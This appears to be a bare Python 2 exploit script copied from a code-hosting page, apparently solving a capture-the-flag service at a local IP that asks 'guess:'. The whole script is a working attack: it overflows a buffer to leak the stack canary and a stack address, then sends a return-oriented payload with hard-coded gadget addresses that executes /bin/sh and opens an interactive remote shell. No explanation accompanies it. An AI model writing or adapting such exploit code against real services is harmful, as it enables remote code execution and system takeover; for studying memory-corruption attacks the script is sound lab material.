Permalink
Cannot retrieve contributors at this time
| import socket | |
| import struct | |
| IP="192.168.1.104" | |
| PORT=44101 | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((IP, PORT)) | |
| def run(data, result=None): | |
| if data: | |
| s.send(data+"\n") | |
| while result and not result in s.recv(1024): | |
| pass | |
| print("[*] Init") | |
| run(None, "guess: ") | |
| print("[*] Leak stack canary") | |
| s.send("A"*(511 + 1)+"\x03") | |
| r = s.recv(1024) | |
| canary = "\x00"+r[524:527] | |
| print("[*] Found canary: %s" % hex(struct.unpack("I", canary)[0])) | |
| run(None, "guess: ") | |
| print("[*] Leak stack position") | |
| s.send("A"*(511 + 12)+"\x03") | |
| r = s.recv(1024) | |
| stack = r[535:539] | |
| stack = struct.unpack("I", r[535:539])[0] - 588 | |
| print("[*] Stack: %s" % hex(stack)) | |
| run(None, "guess: ") | |
| print("[*] Write shellcode") | |
| payload = "exit\x00/bin/sh\x00" | |
| payload += "A"*(512 - len(payload)) | |
| payload += canary | |
| payload += "B"*8 | |
| payload += struct.pack("<I", stack + 588) | |
| payload += struct.pack("<I", 0x080540cd) | |
| payload += "\x00"*4 | |
| payload += struct.pack("<I", stack + 5) | |
| payload += struct.pack("<I", 0x080540a6) | |
| payload += "\x00"*4 | |
| payload += struct.pack("<I", 0x080a87d6) | |
| payload += "\x0b\x00\x00\x00" | |
| payload += struct.pack("<I", 0x08053ED2) | |
| payload += "\x03" | |
| print("[*] Drop the bomb") | |
| s.send(payload) | |
| s.send("echo 0wn3d\n") | |
| while True: | |
| print(s.recv(2048)) | |
| d = raw_input("$ ") | |
| s.send(d+"\n") |